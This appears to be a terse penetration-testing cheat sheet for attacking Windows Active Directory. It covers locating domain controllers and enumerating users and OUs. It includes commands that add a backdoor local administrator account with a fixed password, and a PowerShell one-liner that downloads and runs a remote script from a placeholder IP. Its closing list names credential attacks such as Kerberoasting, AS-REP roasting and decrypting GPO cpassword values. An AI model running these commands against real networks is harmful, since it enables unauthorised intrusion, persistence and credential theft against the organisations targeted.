They are usually DNS Servers. They have usually LDAP listening port 389.
# with nmap
nmap -p53,88,389 $network_ip --open -v -oN dc
# with nmcli
nmcli dev show $iface
# with nslookup
nslookup -type=SRV _ldap._tcp.dc.msdcs.$domain
# WINDOWS HOST
GetADUsers.py $domain/ -dc-ip $ip
# Get all of the OUs in a domain
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A
### Create a new user in admin groupe
# username:password = anon:p3nT3st!
net user anon p3nT3st! /add
net localgroup administrators anon /add
net user anon p3nT3st! /add;net localgroup administrators anon /add
If you cannot import module start a webserver and
IEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')
Automatic tools
AD Enum
ASREPRoasting
Kerberoasting
Dump AD as BloodHound JSON files
Searching GPOs in SYSVOL for cpassword and decrypting
Run without creds and attempt to gather for further enumeration during the run